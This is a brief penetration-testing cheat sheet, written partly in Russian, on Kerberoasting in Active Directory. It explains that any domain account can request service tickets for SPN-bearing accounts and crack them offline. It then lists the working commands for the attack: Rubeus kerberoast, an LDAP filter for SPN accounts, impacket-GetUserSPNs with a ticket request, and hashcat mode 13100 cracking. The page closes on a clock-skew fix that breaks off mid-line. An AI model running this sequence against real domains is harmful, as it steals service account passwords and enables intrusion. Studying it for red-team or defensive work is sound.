KERBEROASTING

Условие для проведения атаки:

Учетная запись в домене с присвоенный SPN атрибутом.

Атакующий отправляет KRB_TGS_REQ сообщения с указанием SPN, ассоциированными с выявленными учетными записями. Контроллер домена не занимается авторизацией, то есть не проверяет имеет ли скомпрометированная учетная запись право доступа к запрашиваемым сервисам, (так как для выдачи TGS пользователю достаточно предоставить свой TGT) поэтому в ответ отправляются сообщения, содержащие TGS билеты, зашифрованные с использованием секретов сервисов. Таким образом, получив TGS-билеты, атакующий может попробовать подобрать пароль к сервисам по словарю оффлайн.

Abuse

Rubeus.exe kerberoast /stats

Ldap request to search for accounts that have SPN.

"(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"

Get users with SPN and send TGS-REQ

impacket-GetUserSPNs -dc-ip $DC_IP $Domain_FQDN/$username:$password -request -outputfile $file

Brute

hashcat -m 13100 $kerberos_hashes $dictionary

Fix errors

[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Если ntpdate или rdate не работают:

Last updated